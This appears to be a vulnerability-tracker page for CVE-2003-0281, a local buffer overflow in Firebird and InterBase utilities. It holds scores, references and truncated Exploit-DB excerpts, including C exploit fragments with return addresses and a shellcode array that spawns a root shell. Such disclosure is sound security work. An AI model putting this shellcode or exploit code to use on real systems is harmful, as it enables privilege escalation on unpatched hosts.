CVE-2003-0281
published 2003-06-16CVE-2003-0281: Buffer overflow in Firebird 1.0.2 and other versions before 1.5, and possibly other products that use the InterBase codebase, allows local users to execute…
PriorityP414medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.8th percentile
Buffer overflow in Firebird 1.0.2 and other versions before 1.5, and possibly other products that use the InterBase codebase, allows local users to execute arbitrary code via a long INTERBASE environment variable when calling (1) gds_inet_server, (2) gds_lock_mgr, or (3) gds_drop.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| firebirdsql | firebird | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation
exploitdb·2003-05-12
CVE-2003-0281 Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation
Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation
---
/* DSR-firebird.c
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
This is Proof Of concept code.
bash-2.05a$ ./DSR-firebird
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
( ( by - [email protected] ) )
Usage: ./DSR-firebird
Targets:
1. [0xbfbff75d] - gds_inet_server
2. [0xbfbff75c] - gds_lock_mgr
3. [0xbfbff75e] - gds_drop
bash-2.05a$
*/
#include
#include
#include
#define LOCK "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP "/usr/local/firebird/bin/gds_drop"
#define INET "/usr/local/firebird/bin/gds_inet_server"
#define LEN 1056
char dropcode[]=
"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
"\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
Exploit-DB
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)
exploitdb·2002-06-18
CVE-2003-0281 Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/5044/info
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.
A buffer overflow has been discovered in the gds_drop program packaged with Interbase. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code.
Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue.
/* DSR-firebird.c by [email protected]
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
bash-2.05a$ ./
Exploit-DB
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)
exploitdb·2002-06-15
CVE-2003-0281 Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)
---
source: https://www.securityfocus.com/bid/5044/info
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.
A buffer overflow has been discovered in the gds_drop program packaged with Interbase. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code.
Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue. *
#!/usr/bin/perl -w
#
# gds_drop exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=105259012802997&w=2http://seclists.org/lists/bugtraq/2002/Jun/0212.htmlhttp://secunia.com/advisories/8758http://security.gentoo.org/glsa/glsa-200405-18.xmlhttp://www.securityfocus.com/bid/7546https://exchange.xforce.ibmcloud.com/vulnerabilities/11977http://marc.info/?l=bugtraq&m=105259012802997&w=2http://seclists.org/lists/bugtraq/2002/Jun/0212.htmlhttp://secunia.com/advisories/8758http://security.gentoo.org/glsa/glsa-200405-18.xmlhttp://www.securityfocus.com/bid/7546https://exchange.xforce.ibmcloud.com/vulnerabilities/11977
2003-06-16
Published